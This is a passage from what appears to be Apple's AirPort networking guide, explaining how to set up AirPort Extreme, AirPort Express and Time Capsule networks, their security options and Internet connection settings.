Advanced Options 43 Extending the Range of an 802.11n Network 45 Keeping Your Network Secure 49 Directing Network Traffic to a Specific Computer on Your Network (Port Mapping) 51 Logging 52 Using Back to My Mac on your Wireless Network 53 Setting up IPv6 54 Sharing and Securing USB Hard Disks on Your Network 55 Using a Time Capsule in Your Network 55 Connecting a USB Printer to an Apple Wireless Device 56 Adding a Wireless Client to Your 802.11n Network 57 Solving Problems Chapter 4 59 Behind the Scenes 59 Basic Networking 63 Items That Can Cause Interference with AirPort Glossary 641 3 1 Getting Started AirPort offers the easiest way to provide wireless Internet access and networking anywhere in the home, classroom, or office. AirPort is based on the latest Institute of Electrical and Electronics Engineers (IEEE) 802.11n draft specification and provides fast and reliable wireless networking in the home, classroom, or small office. You can enjoy data transfer rates of up to five times faster than data rates provided by the 802.11g standard and more than twice the network range. The new AirPort Extreme Base Station and the new Time Capsule are based on simultaneous dual-band technology, so they work in both the 2.4 gigahertz (GHz) or 5 GHz spectrum at the same time. And they are 100 percent backward-compatible, so Mac computers and PCs that use 802.11a, 802.11b, 802.11g, or IEEE draft specification 802.11n wireless cards can connect to an AirPort wireless network. They also work flawlessly with the AirPort Express for wireless music streaming and more. The AirPort Extreme Base Station and Time Capsule have three additional 10/100/1000BaseT Gigabit Ethernet ports, so you don’t need to include another router in your network. To set up an AirPort Extreme Base Station, an AirPort Express, or a Time Capsule, you use AirPort Utility, the easy-to-use setup and management application. AirPort Utility has a simple user experience, with all software controls accessible from the same application. It provides better management of several Apple wireless devices, with client-monitoring features and logging. If you’re using AirPort Utility version 5.4 or later, you can set up a guest network, in both the 2.4 GHz and 5 GHz bands, so that guests can connect to the Internet using your AirPort network, while you keep your private network secure. You can also choose to set up guest accounts that expire, to grant temporary access to your network; you no longer need to give your network password to visitors in your home or office. You can even set up accounts with time constraints for the best in parental controls. AirPort Utility supports IPv6 and Bonjour, so you can “advertise” network services such as printing and sharing a hard disk over the Wide Area Network (WAN) port.4 Chapter 1 Getting Started Note: When the features discussed in this document apply to the AirPort Extreme Base Station, AirPort Express, and Time Capsule, the devices are referred to collectively as Apple wireless devices. With an AirPort Extreme Base Station or a Time Capsule, you can connect a USB hard disk so that everyone on the network can back up, store, and share files. Every Time Capsule includes an internal AirPort disk, so you don’t need to connect an external one. If you want, you can connect additional USB disks to the USB port on your Time Capsule. You can also connect a USB printer to the USB port on any Apple wireless device, so that everyone on the network can access the printer or hub. All Apple wireless devices provide strong, wireless security. They offer a built-in firewall and support industry-standard encryption technologies. Yet the simple setup utility and powerful access controls make it easy for authorized users to connect to the AirPort network they create. You can use an Apple wireless device to provide wireless Internet access and share a single Internet connection among several computers in the following ways:  Set up the device to act as a router and provide Internet Protocol (IP) addresses to computers on the network using Dynamic Host Configuration Protocol (DHCP) and Network Address Translation (NAT). When the wireless device is connected to a DSL or cable modem that is connected to the Internet, it receives webpages and email content from the Internet through its Internet connection, and then sends the content to wireless-enabled computers, using the wireless network or using Ethernet if there are computers connected to the Ethernet ports.  Set up the Apple wireless device to act as a bridge on an existing network that already has Internet access and a router providing IP addresses. The device passes IP addresses and the Internet connection to AirPort or wireless-enabled computers, or computers connected to the wireless device by Ethernet. This document provides information about the latest AirPort Extreme Base Station, AirPort Express, and Time Capsule, and detailed information about designing 802.11n networks with AirPort Utility for computers using Mac OS X v10.5 or later, and Windows Vista or Windows XP with Service Pack 2. If you’re using previous versions of Mac OS X, or are setting up earlier versions of AirPort devices, you’ll find more information at www.apple.com/support/airport.Chapter 1 Getting Started 5 You can set up an Apple wireless device and connect to the Internet wirelessly in minutes. But because Apple wireless devices are flexible and powerful networking products, you can also create an AirPort network that does much more. If you want to design an AirPort network that provides Internet access to non-AirPort computers via Ethernet, or take advantage of some of your wireless device’s more advanced features, use this document to design and implement your network. You can find more general wireless networking information and an overview of AirPort technology in the earlier AirPort documents, located at www.apple.com/support/manuals/airport. Note: The images of AirPort Utility in this document are from Mac OS X v10.5. If you’re using a Windows computer, the images you see in this document may be slightly different from what you see on your screen. Configuring an Apple Wireless Device for Internet Access Using AirPort Utility Like your computer, Apple wireless devices must be set up with the appropriate hardware and IP networking information to connect to the Internet. Install AirPort Utility, which came on the CD with your wireless device, and use it to provide Internet configuration information and other network settings. AirPort Utility combines the ease of use of AirPort Setup Assistant and the power of AirPort Admin Utility. It is installed in the Utilities folder in the Applications folder on a Macintosh computer using Mac OS X, and in Start > All Programs > AirPort on computers using Windows. AirPort Utility walks you through the setup process by asking a series of questions to determine how the device’s Internet connection and other interfaces should be set up. Enter the settings you received from your ISP or network administrator for Ethernet, PPP over Ethernet (PPPoE), or your local area network (LAN); give your AirPort network a name and password; set up a device as a wireless bridge to extend the range of your existing AirPort network; and set other options. When you’ve finished entering the settings, AirPort Utility transfers the settings to your wireless device. Then it connects to the Internet and shares its Internet connection with computers that join its AirPort network. You can also create an AirPort network that takes advantage of the more advanced networking features of Apple wireless devices. To set more advanced AirPort options, use AirPort Utility to manually set up your wireless device’s configuration, or make quick adjustments to one you’ve already set up. Some of the AirPort advanced networking features can be configured only using the manual setup features in AirPort Utility. 6 Chapter 1 Getting Started Set up your Apple wireless device manually using AirPort Utility when:  You want to provide Internet access to computers that connect to the wireless device using Ethernet  you’ve already set up your device, but you need to change one setting, such as your account information  You need to configure advanced settings such as channel frequency, advanced security options, closed networks, DHCP lease time, access control, WAN privacy, power controls, or port mapping or other options For instructions on using AirPort Utility to manually set up your wireless device and network, see “Using AirPort Utility” on page 15. Extending the Range of Your AirPort Network You can extend the range of your network by using AirPort Utility to set up wireless connections among several devices in your network, or to connect a device using Ethernet to create a roaming network. For more information on extending the range of your network, see “Connecting Additional Wireless Devices to Your AirPort Network” on page 41. Sharing a USB Hard Disk Connected to an AirPort Extreme Base Station or Time Capsule If you’re using an AirPort Extreme Base Station or a Time Capsule, you can connect a USB hard disk to it, and computers connected to the network—wired or wireless, Mac or Windows—can share files using the hard disk. Every Time Capsule includes an internal AirPort disk, so you don’t need to connect an external one. If you want, you can connect additional USB disks to the USB port on your Time Capsule. See “Sharing and Securing USB Hard Disks on Your Network” on page 54. Printing with an Apple Wireless Device If you have a compatible USB printer connected to your Apple wireless device, computers on the AirPort network can use Bonjour (Apple’s zero-configuration networking technology) to print to the printer. For instructions about printing to a USB printer from a computer, see “Connecting a USB Printer to an Apple Wireless Device” on page 55. Sharing Your Computer’s Internet Connection If your computer is connected to the Internet, you can share your Internet connection with other computers using Mac OS X version 10.2 or later, or Windows XP with Service Pack 2. This is sometimes called using your computer as a software base station.Chapter 1 Getting Started 7 You can share your Internet connection as long as your computer is connected to the Internet. If your computer goes to sleep or is restarted, or if you lose your Internet connection, you need to restart Internet sharing. To start Internet sharing on a computer using Mac OS X v10.5 or later: 1 Open System Preferences and click Sharing. 2 Choose the port you want to use to share your Internet connection from the “Share your connection using” pop-up menu. 3 Select the port you want to use to share your Internet connection in the “To computers using” list. You can choose to share your Internet connection with AirPort-enabled computers or computers with built-in Ethernet, for example. 4 Select Internet Sharing in the Services list. 5 If you want to share your Internet connection with computers using AirPort, click AirPort Options to give your network a name and password. 8 Chapter 1 Getting Started To start Internet sharing on a computer using Windows: 1 Open Control Panel from the Start menu, and then click “Network and Internet.” 2 Click “Network and Sharing Center.” 3 Click “Manage network connections” in the Tasks list. 4 Right-click the network connection you want to share, and then select Properties. 5 Click Sharing and then select “Allow other network users to connect through this computer’s Internet connection.” Note: If your Internet connection and your local network use the same port (built-in Ethernet, for example), contact your ISP before you turn on Internet sharing. In some cases (if you use a cable modem, for example) you might unintentionally affect the network settings of other ISP customers, and your ISP might terminate your service to prevent you from disrupting its network. The following chapters explain AirPort security options, AirPort network design and setup, and other advanced options.2 9 2 AirPort Security This chapter provides an overview of the security features available in AirPort. Apple has designed its wireless devices to provide several levels of security, so you can enjoy peace of mind when you access the Internet, manage online financial transactions, or send and receive email. The AirPort Extreme Base Station and Time Capsule also include a slot for inserting a lock to deter theft. For information and instructions for setting up these security features, see “Setting Up the AirPort Extreme Network” on page 17. Security for AirPort Networks at Home Apple gives you ways to protect your wireless AirPort network as well as the data that travels over it. NAT Firewall You can isolate your wireless network with firewall protection. Apple wireless devices have a built-in Network Address Translation (NAT) firewall that creates a barrier between your network and the Internet, protecting data from Internet-based IP attacks. The firewall is automatically turned on when you set up the device to share a single Internet connection. For computers with a cable or DSL modem, AirPort can actually be safer than a wired connection. Closed Network Creating a closed network keeps the network name and the very existence of your network private. Prospective users of your network must know the network name and password to access it. Use AirPort Utility, located in the Utilities folder in the Applications folder on a Macintosh computer using Mac OS X, or in Start > All Programs > AirPort on a computer using Windows, to create a closed network.10 Chapter 2 AirPort Security Password Protection and Encryption AirPort uses password protection and encryption to deliver a level of security comparable to that of traditional wired networks. Users can be required to enter a password to log in to the AirPort network. When transmitting data and passwords, the wireless device uses up to 128-bit encryption, through either Wi-Fi Protected Access (WPA), WPA2, or Wired Equivalent Privacy (WEP), to scramble data and help keep it safe. If you’re setting up an 802.11n-based AirPort device, you can also use WEP (Transitional Security Network) if both WEP-compatible and WPA/WPA2-compatible computers will join your network. Note: WPA security is available only to AirPort Extreme wireless devices; AirPort and AirPort Extreme clients using Mac OS X 10.3 or later and AirPort 3.3 or later; and to non-Apple clients using other 802.11 wireless adapters that support WPA. WPA2 security requires firmware version 5.6 or later for an AirPort Extreme Base Station, firmware version 6.2 or later for an AirPort Express, firmware version 7.3 or later for a Time Capsule, and a Macintosh computer with an AirPort Extreme wireless card using AirPort 4.2 or later. If your computer uses Windows XP or Windows Vista, check the documentation that came with your computer to see if your computer supports WPA2. Security for AirPort Networks in Businesses and Classrooms Businesses and schools need to restrict network communications to authorized users and keep data safe from prying eyes. To meet this need, Apple wireless devices and software provide a robust suite of security mechanisms. Use AirPort Utility to set up these advanced security features. Transmitter Power Control Because radio waves travel in all directions, they can extend outside the confines of a specific building. The Transmit Power setting in AirPort Utility lets you adjust the transmission range of your device’s network. Only users within the network vicinity have access to the network. MAC Address Access Control Every AirPort and wireless card have a unique Media Access Control (MAC) address. For AirPort Cards and AirPort Extreme Cards, the MAC address is sometimes referred to as the AirPort ID. Support for MAC address access control lets administrators set up a list of MAC addresses and restrict access to the network to only those users whose MAC addresses are in the access control list.Chapter 2 AirPort Security 11 RADIUS Support The Remote Authentication Dial-In User Service (RADIUS) makes securing a large network easy. RADIUS is an access control protocol that allows a system administrator to create a central list of the user names and passwords of computers that can access the network. Placing this list on a centralized server allows many wireless devices to access the list and makes it easy to update. If the MAC address of a user’s computer (which is unique to each 802.11 wireless card) is not on your approved MAC address list, the user cannot join your network. Wi-Fi Protected Access (WPA) and WPA2 There has been increasing concern about the vulnerabilities of WEP. In response, the Wi-Fi Alliance, in conjunction with the IEEE, has developed enhanced, interoperable security standards called Wi-Fi Protected Access (WPA) and WPA2. WPA and WPA2 use specifications that bring together standards-based, interoperable security mechanisms that significantly increase the level of data protection and access control for wireless LANs. WPA and WPA2 provide wireless LAN users with a high-level assurance that their data remains protected and that only authorized network users can access the network. A wireless network that uses WPA or WPA2 requires all computers that access the wireless network to have WPA or WPA2 support. WPA provides a high level of data protection and (when used in Enterprise mode) requires user authentication. The main standards-based technologies that constitute WPA include Temporal Key Integrity Protocol (TKIP), 802.1X, Message Integrity Check (MIC), and Extensible Authentication Protocol (EAP). TKIP provides enhanced data encryption by addressing the WEP encryption vulnerabilities, including the frequency with which keys are used to encrypt the wireless connection. 802.1X and EAP provide the ability to authenticate a user on the wireless network. 802.1X is a port-based network access control method for wired as well as wireless networks. The IEEE adopted 802.1X as a standard in August 2001. The Message Integrity Check (MIC) is designed to prevent an attacker from capturing data packets, altering them, and resending them. The MIC provides a strong mathematical function in which the receiver and the transmitter each compute and then compare the MIC. If they do not match, the data is assumed to have been tampered with and the packet is dropped. If multiple MIC failures occur, the network may initiate countermeasures.12 Chapter 2 AirPort Security The EAP protocol known as TLS (Transport Layer Security) presents a user’s information in the form of digital certificates. A user’s digital certificates can comprise user names and passwords, smart cards, secure IDs, or any other identity credentials that the IT administrator is comfortable using. WPA uses a wide variety of standards-based EAP implementations, including EAP-Transport Layer Security (EAP-TLS), EAP-Tunnel Transport Layer Security (EAP-TTLS), and Protected Extensible Authentication Protocol (PEAP). AirPort Extreme also supports the Lightweight Extensible Authentication Protocol (LEAP), a security protocol used by Cisco access points to dynamically assign a different WEP key to each user. AirPort Extreme is compatible with Cisco’s LEAP security protocol, enabling AirPort users to join Cisco-hosted wireless networks using LEAP. In addition to TKIP, WPA2 supports the AES-CCMP encryption protocol. Based on the very secure AES national standard cipher, combined with sophisticated cryptographic techniques, AES-CCMP was specifically designed for wireless networks. Migrating from WEP to WPA2 requires new firmware for the AirPort Extreme Base Station (version 5.6 or later), and for AirPort Express (version 6.2 or later). Devices using WPA2 mode are not backward compatible with WEP. WPA and WPA2 have two modes:  Personal mode, which relies on the capabilities of TKIP or AES-CCMP without requiring an authentication server  Enterprise mode, which uses a separate server, such as a RADIUS server, for user authentication WPA and WPA2 Personal  For home or Small Office/Home Office (SOHO) networks, WPA and WPA2 operates in Personal mode, taking into account that the typical household or small office does not have an authentication server. Instead of authenticating with a RADIUS server, users manually enter a password to log in to the wireless network. When a user enters the password correctly, the wireless device starts the encryption process using TKIP or AES-CCMP. TKIP or AES-CCMP takes the original password and derives encryption keys mathematically from the network password. The encryption key is regularly changed and rotated so that the same encryption key is never used twice. Other than entering the network password, the user isn’t required to do anything to make WPA or WPA2 Personal work in the home.Chapter 2 AirPort Security 13 WPA and WPA2 Enterprise WPA is a subset of the draft IEEE 802.11i standard and effectively addresses the wireless local area network (WLAN) security requirements for the enterprise. WPA2 is a full implementation of the ratified IEEE 802.11i standard. In an enterprise with IT resources, WPA should be used in conjunction with an authentication server such as RADIUS to provide centralized access control and management. With this implementation in place, the need for add-on solutions such as virtual private networks (VPNs) may be eliminated, at least for securing wireless connections in a network. For more information about setting up a WPA or WPA2 protected network, see “Using Wi-Fi Protected Access” on page 45.3 14 3 AirPort Network Designs This chapter provides overview information and instructions for the types of AirPort Extreme networks you can set up, and some of the advanced options of AirPort Extreme. Use this chapter to design and set up your AirPort Extreme network. Configuring your Apple wireless device to implement a network design requires three steps: Step 1: Setting Up the AirPort Extreme Network Computers communicate with the wireless device over the AirPort wireless network. When you set up the AirPort network created by the wireless device, you can name the wireless network, assign a password that will be needed to join the wireless network, and set other options. Step 2: Configuring and Sharing Internet Access When computers access the Internet through the AirPort Extreme network, the wireless device connects to the Internet and transmits information to the computers over the AirPort Extreme network. You provide the wireless device with settings appropriate for your ISP and configure how the device shares this connection with other computers. Step 3: Setting Advanced Options These settings are optional for most users. They include using the Apple wireless device as a bridge between your AirPort Extreme network and an Ethernet network, setting advanced security options, extending the AirPort network to other wireless devices, and fine-tuning other settings. For specific instructions on all these steps, refer to the sections later in this chapter. You can do most of your setup and configuration tasks using AirPort Utility, and following the onscreen instructions to enter your ISP and network information. To set advanced options, you need to use AirPort Utility to manually set up your Apple wireless device and AirPort network.Chapter 3 AirPort Network Designs 15 Using AirPort Utility To set up and configure your computer or Apple wireless device to use AirPort Extreme for basic wireless networking and Internet access, use AirPort Utility and answer a series of questions about your Internet settings and how you would like to set up your network. 1 Open AirPort Utility, located in the Utilities folder in the Applications folder on a Mac, or in Start > All Programs > AirPort on a Windows computer. 2 Select your device in the list on the left if there is more than one device in your network. Click Continue, and then follow the onscreen instructions to enter the settings from your ISP or network administrator for the type of network you want to set up. See the network diagrams later in this chapter for the types of networks you can set up using AirPort Utility. To set up a more complicated network, or to make adjustments to a network you’ve already set up, use the manual setup features in AirPort Utility. Setting AirPort preferences Use AirPort preferences to set up your wireless device to alert you when there are updates available for your device. You can also set it up to notify you if there are problems detected, and to provide instructions to help solve the problems. To set AirPort preferences: 1 Open AirPort Utility, located in the Utilities folder inside the Applications folder on a Mac, and in Start > All Programs > AirPort on a Windows computer. 2 Do one of the following:  On a Mac, choose AirPort Utility > Preferences  On a Windows computer, choose File > Preferences16 Chapter 3 AirPort Network Designs Select from the following checkboxes:  Select “Check for Updates when opening AirPort Utility” to automatically check the Apple website for software and firmware updates each time you open AirPort Utility.  Select the “Check for updates” checkbox, and then choose a time interval from the pop-up menu, such as weekly, to check for software and firmware updates in the background. AirPort Utility opens if updates are available.  Select “Monitor Apple wireless devices for problems” to investigate problems that may cause the device’s status light to blink amber. With the checkbox selected, AirPort Utility opens if a problem is detected, and then provides instructions to help resolve the problem. This option monitors all of the wireless devices on the network.  Select “Only Apple wireless devices that I have configured” to monitor only the devices you’ve set up using this computer. Monitoring devices for problems requires an AirPort wireless device that supports firmware version 7.0 or later. To set up your wireless device manually: 1 Open AirPort Utility, located in the Utilities folder in the Applications folder on a Mac, or in Start > All Programs > AirPort on a Windows computer. 2 Select your device in the list. 3 Choose Base Station > Manual Setup and enter the password if necessary. The default device password is public. If you don’t see your wireless device in the list: 1 Open the AirPort status menu in the menu bar on a Mac and make sure that you’ve joined the AirPort network created by your wireless device. On a Windows computer, hover the cursor over the wireless network icon in the status tray to make sure the computer is connected to the correct network. The default network name for an Apple wireless device is AirPort Network XXXXXX, where XXXXXX is replaced with the last six digits of the AirPort ID, (or MAC address). The AirPort ID is printed on the bottom of Apple wireless devices. 2 Make sure your computer’s network and TCP/IP settings are configured properly. On a computer using Mac OS X, choose AirPort from the Show pop-up menu in the Network pane of System Preferences. Then choose Using DHCP from the Configure IPv4 pop-up menu in the TCP/IP pane. On a computer using Windows, right-click the wireless connection icon that displays the AirPort network, and choose Status. Click Properties, select Internet Protocol (TCP/IP), and then click Properties. Make sure “Obtain an IP address automatically” is selected.Chapter 3 AirPort Network Designs 17 If you can’t open the wireless device settings: 1 Make sure your network and TCP/IP settings are configured properly. On a computer using Mac OS X, select AirPort from the network connection services list in the Network pane of System Preferences. Click Advanced, and then choose Using DHCP from the Configure IPv4 pop-up menu in the TCP/IP pane. On a computer using Windows, right-click the wireless connection icon that displays the AirPort network, and choose Status. Click Properties, select Internet Protocol (TCP/IP), and then click Properties. Make sure “Obtain an IP address automatically” is selected. 2 Make sure you entered the wireless device password correctly. The default password is public. If you’ve forgotten the device password, you can reset it to public by resetting the device. To temporarily reset the device password to public, hold down the reset button for one second. To reset the device back to its default settings, hold the reset button for five full seconds. If you’re on an Ethernet network that has other devices, or you’re using Ethernet to connect to the device: AirPort Utility scans the Ethernet network to create the list of devices. As a result, when you open AirPort Utility, you may see devices that you cannot configure. Setting Up the AirPort Extreme Network The first step in configuring your Apple wireless device is setting up the device and the network it will create. You can set up most features using AirPort Utility and following the onscreen instructions to enter the information from your ISP or network administrator. To configure a network manually or set advanced options, open your wireless device’s configuration in AirPort Utility and manually set up your device and network. 1 Choose the network of the wireless device you want to configure from the AirPort status menu on a computer using Mac OS X, or from the wireless connection icon in the status tray on a computer using Windows. 2 Open AirPort Utility and select the wireless device from the list. If you don’t see the device you want to configure, click Rescan to scan for available wireless devices, and then select the one you want from the list. 18 Chapter 3 AirPort Network Designs 3 Choose Base Station > Manual Setup and enter the password if necessary. The default device password is public. You can also double-click the name of the wireless device to open its configuration in a separate window. When you open the manual setup window, the Summary pane is displayed. The summary pane provides information and status about your wireless device and network.Chapter 3 AirPort Network Designs 19 If the wireless device reports a problem, the status icon turns yellow. Click Base Station Status to display the problem and suggestions to resolve it. Wireless Device Settings Click the AirPort button, and then click Base Station or Time Capsule, depending on the device you’re setting up, to enter information about the wireless device. Give the Device a Name Give the device an easily identifiable name. This makes it easy for administrators to locate a specific device on an Ethernet network with several devices. Change the Device Password The device password protects its configuration so that only the administrator can modify it. The default password is public. It is a good idea to change the device password to prevent unauthorized changes to it. If the password is not changed from public, you’ll not be prompted for a password when you select it from the list and click Configure. Other Information  Allow configuration over the WAN port. This allows you to administer the wireless device remotely.  Advertise the wireless device over the Internet using Bonjour. If you have an account with a dynamic DNS service, you can connect to it over the Internet.  Set the device time automatically. If you have access to a Network Time Protocol server, whether on your network or on the Internet, choose it from the pop-up menu. This ensures your wireless device is set to the correct time.20 Chapter 3 AirPort Network Designs Set Device Options Click Base Station Options and set the following:  Enter a contact name and location for the wireless device. The name and location are included in some logs the device generates. The contact and location fields may be helpful if you’ve more than one wireless device on your network.  Set status light behavior to either Always On or Flash On Activity. If you choose Flash On Activity, the device status light blinks when there is network traffic.  If your wireless device supports it, select “Check for firmware updates” and choose an increment, such as Daily from the pop-up menu. Wireless Network Settings Click Wireless, and enter the network name, radio mode, and other wireless information. Setting the Wireless Mode AirPort Extreme supports two wireless modes:  Create a wireless network. Choose this option if you’re creating a new AirPort Extreme network.  Extend a wireless network. Choose this option if you plan to connect another Apple wireless device to the network you’re setting up. Naming the AirPort Extreme Network Give your AirPort network a name. This name appears in the AirPort status menu on the AirPort-enabled computers that are in range of your AirPort network.Chapter 3 AirPort Network Designs 21 Choosing the Radio Mode Choose 802.11a/n - 802.11b/g from the Radio Mode pop-up menu if computers with 802.11a, 802.11n, 802.11g, or 802.11b wireless cards will join the network. Each client computer will connect to the network and transmit network traffic at the highest possible speed. Choose 802.11n - 802.11b/g if only computers with 802.11n, 802.11b, or 802.11g compatible wireless cards will join the network. Note: If you don’t want to use an 802.11n radio mode, hold down the Option key and chose a radio mode that doesn’t include 802.11n. Changing the Channel The “channel” is the radio frequency over which your wireless device communicates. If you use only one device (for example, at home), you probably won’t need to change the channel frequency. If you set up several wireless devices in a school or office, use different channel frequencies for devices that are within approximately 150 feet of each other. Adjacent wireless devices should have at least 4 channels between their channel frequencies. So if device A is set to channel 1, device B should be set to channel 6 or 11. For best results, use channels 1, 6, or 11 when operating your device in the 2.4 GHz range. Choose Manually from the Radio Channel Selection pop-up menu, and then click Edit to set the channels manually. AirPort-enabled computers automatically tune to the channel frequency your wireless device is using when they join the AirPort network. If you change the channel frequency, AirPort client computers do not need to make any changes. Password-protect Your Network To password-protect your network, you can choose from a number of wireless security options. In the AirPort pane of AirPort Utility, click Wireless and choose one of the following options from the Wireless Security pop-up menu:  None: Choosing this option turns off all password protection for the network. Any computer with a wireless adapter or card can join the network, unless the network is set up to use access control. See “Setting Up Access Control” on page 47.  WEP: If your device supports it, choose this option and enter a password to protect your network with a Wired Equivalent Privacy (WEP) password. Your Apple wireless device supports 40-bit and 128-bit encryption. To use 40-bit WEP, don’t use an 802.11n radio mode.22 Chapter 3 AirPort Network Designs  WPA/WPA2 Personal: Choose this option to protect your network with Wi-Fi Protected Access. You can use a password between 8 and 63 ASCII characters or a Pre-Shared Key of exactly 64 hexadecimal characters. Computers that support WPA and computers that support WPA2 can join the network. Choose WPA2 Personal if you want only computers that support WPA2 to join your network.  WPA/WPA2 Enterprise: Choose this option if you’re setting up a network that includes an authentication server, such as a RADIUS server, with individual user accounts. Enter the IP address and port number for the primary and optional secondary server, and enter a “shared secret,” which is the password for the server. Choose WPA2 Enterprise if you want only computers that support WPA2 to join the network.  WEP (Transitional Security Network): If your device supports it, you can use this option to allow computers using WPA or WPA2 to join the network. Computers or devices that use WEP can also join the network. WEP (Transitional Security Network) supports 128-bit encryption. To use this option, the wireless device use an 802.11n radio mode. Hold the Option key on your keyboard while clicking the Wireless Security pop-up menu to use WEP (Transitional Security Netowrk). For more information and instructions for setting up WPA or WPA2 on your network, see “Using Wi-Fi Protected Access” on page 45. Setting Wireless Options Click Wireless Options to set additional options for your network.Chapter 3 AirPort Network Designs 23 Setting Additional Wireless Options Use the Wireless Options pane to set the following:  5 GHz network name: Provide a name for the 5 GHz segment of the dual-band network if you want it to have a different name than the 2.4 GHz network.  Country: Choose the country for the location of your network from the Country pop-up menu.  Multicast rate: Choose a multicast rate from the pop-up menu. If you set the multicast rate high, only clients on the network that are within range and can achieve the speed you set will receive transmissions.  Transmit power: Choose a setting from the Transmit Power pop-up menu to set the network range (the lower the percentage, the shorter the network range).  WPA Group Key Timeout: Enter a number in the text field, and choose an increment from the pop-up menu to change the frequency of key rotation.  Use Wide Channels: If you set up your network to use the 5 GHz frequency range, you can use wide channels to provide higher network throughput. Note: Using wide channels is not permitted in some countries.  Create a closed network: Selecting a closed network hides the name of the network so that users must enter the exact network name and password to join the AirPort Extreme network.  Use interference robustness: Interference robustness can solve interference problems caused by other devices or networks. To set more advanced security options, see “Keeping Your Network Secure” on page 45.24 Chapter 3 AirPort Network Designs Setting up a Guest Network Click Guest Network and then enter the network name and other options for the guest network. When you set up a guest network, a portion of your connection to the Internet is reserved for “guests”, wireless clients that can join the guest network and connect to the Internet without accessing your private network. Select “Allow guest network clients to communicate with each other” to allow client computers to share files and services with each other while they’re connected to the guest network. Make sure sharing services are set up on the client computers. Configuring and Sharing Internet Access The next step is setting up your wireless device’s Internet connection and sharing its Internet access with client computers. The following sections tell you what to do, depending on how your device connects to the Internet. You’re Using a DSL or Cable Modem In most cases, you can implement this network design using AirPort Utility and following the onscreen instructions to set up your wireless device and network. You need to use AirPort Utility to manually set up your device only if you want to set up or adjust optional advanced settings.Chapter 3 AirPort Network Designs 25 What It Looks Like How It Works  The Apple wireless device (in this example, a Time Capsule) connects to the Internet through its Internet WAN (<) connection to your DSL or cable modem.  Computers using AirPort or computers connected to the wireless device’s Ethernet LAN port (G) connect to the Internet through the device.  The device is set up to use a single, public IP address to connect to the Internet, and uses DHCP and NAT to share the Internet connection with computers on the network using private IP addresses.  AirPort computers and Ethernet computers communicate with one another through the wireless device. Important: Connect Ethernet computers that are not connected to the Internet to the device’s LAN port (G) only. Since the device can provide network services, you must set it up carefully to avoid interfering with other services on your Ethernet network. What You Need for a DSL or Cable Modem Connection DSL or cable modem to Internet to Ethernet port Time Capsule < Ethernet WAN port 2.4 or 5 GHz Components Check Comments Internet account with DSL or cable modem service provider Does your service provider use a static IP or DHCP configuration? You can get this information from your service provider or the Network preferences pane on the computer you use to access the Internet through this service provider. Apple wireless device (an AirPort Extreme Base Station, an AirPort Express, or a Time Capsule) Place the device near your DSL or cable modem.26 Chapter 3 AirPort Network Designs What to Do If you’re using AirPort Utility to assist you with configuring the Apple wireless device for Internet access: 1 Open AirPort Utility, located in the Utilities folder in the Applications folder on a Mac, or in Start > All Programs > AirPort on a Windows computer. 2 Follow the onscreen instructions and enter the settings you received from your service provider to connect to the Internet, and then set up the device to share the Internet connection with computers on the network. If you’re using AirPort Utility to manually set up your wireless device: 1 Make sure that your DSL or cable modem is connected to the Ethernet WAN port (<) on your Apple wireless device. 2 Open AirPort Utility, located in the Utilities folder in the Applications folder on a Mac, or in Start > All Programs > AirPort on a Windows computer. Select your wireless device and choose Base Station > Manual Setup, or double-click your device’s icon in the list to open the configuration in a separate window. 3 Click the Internet button. Click Internet Connection and choose Ethernet or PPPoE from the Connect Using pop-up menu, depending on which one your service provider requires. If your service provider gave you PPPoE connection software, such as EnterNet or MacPoET, choose PPPoE. Note: If you’re connecting to the Internet through a router using PPPoE and your Apple wireless device is connected to the router via Ethernet, you do not need to use PPPoE on your wireless device. Choose Ethernet from the Connect Using pop-up menu in the Internet pane, and deselect the “Distribute IP addresses” checkbox in the Network pane. Contact your service provider if you aren’t sure which one to select. 4 Choose Manually or Using DHCP from the Configure IPv4 pop-up menu if you chose Ethernet from the Connect Using pop-up menu, depending on how your service provider provides IP addresses.  If your provider gave you an IP address and other numbers with your subscription, use that information to configure the wireless device IP address manually. If you aren’t sure, ask your service provider. Enter the IP address information in the fields below the Configure IPv4 pop-up menu.Chapter 3 AirPort Network Designs 27  If you chose PPPoE, your ISP provides your IP address automatically using DHCP. If your service provider asks you for the MAC address of your wireless device, use the address of the Ethernet WAN port (<), printed on the label on the bottom of the device. If you’ve already used AirPort Utility to set up your wireless device, the fields below the Configure IPv4 pop-up menu may already contain the information appropriate for your service provider. You can change the WAN Ethernet speed if you have specific requirements for the network you’re connected to. In most cases, the settings that are configured automatically are correct. Your service provider should be able to tell you if you need to adjust these settings. Changing the WAN Ethernet speed can affect the way the wireless device interacts with the Internet. Unless your service provider has given you specific settings, use the automatic settings. Entering the wrong settings can affect network performance. Contact your service provider for the information you should enter in these fields. Use this pop-up menu if you need to adjust the speed of the Ethernet WAN port.28 Chapter 3 AirPort Network Designs If you configure TCP/IP using DHCP, choose Using DHCP from the Configure IPv4 pop-up menu. Your IP information is provided automatically by your ISP using DHCP. 5 If you chose PPPoE from the Connect Using pop-up menu, enter the PPPoE settings your service provider gave you. Leave the Service Name field blank unless your service provider requires a service name. Note: With AirPort, you don’t need to use a third-party PPPoE connection application. You can connect to the Internet using AirPort. Your service provider may require you to enter information in these fields. Contact your service provider for the information you should enter in these fields.Chapter 3 AirPort Network Designs 29 If you’re connecting to the Internet through a router that uses PPPoE to connect to the Internet, and your wireless device is connected to the router via Ethernet, you do not need to use PPPoE on your device. Choose Ethernet from the Connect Using pop-up menu in the Internet pane, and deselect the “Distribute IP addresses” checkbox in the Network pane. Because your router is distributing IP addresses, your wireless device doesn’t need to. More than one device on a network providing IP addresses can cause problems. 6 Click PPPoE to set PPPoE options for your connection.  Choose Always On, Automatic, or Manual, depending on how you want to control when your wireless device is connected to the Internet. If you choose Always On, your device stays connected to your modem and the Internet as long as the modem is turned on. If you choose Automatic, the wireless device connects to the modem, which connects to the Internet when you use an application that requires an Internet connection, such as email or an instant message or web application. If you choose Manual, you need to connect the modem to the Internet when you use an application that requires an Internet connection. If you chose Automatic or Manual from the Connection pop-up menu, you need to choose an increment, such as “10 minutes,” from the “Disconnect if idle” pop-up menu. If you don’t use an Internet application after the increment of time has passed, you’ll be disconnected f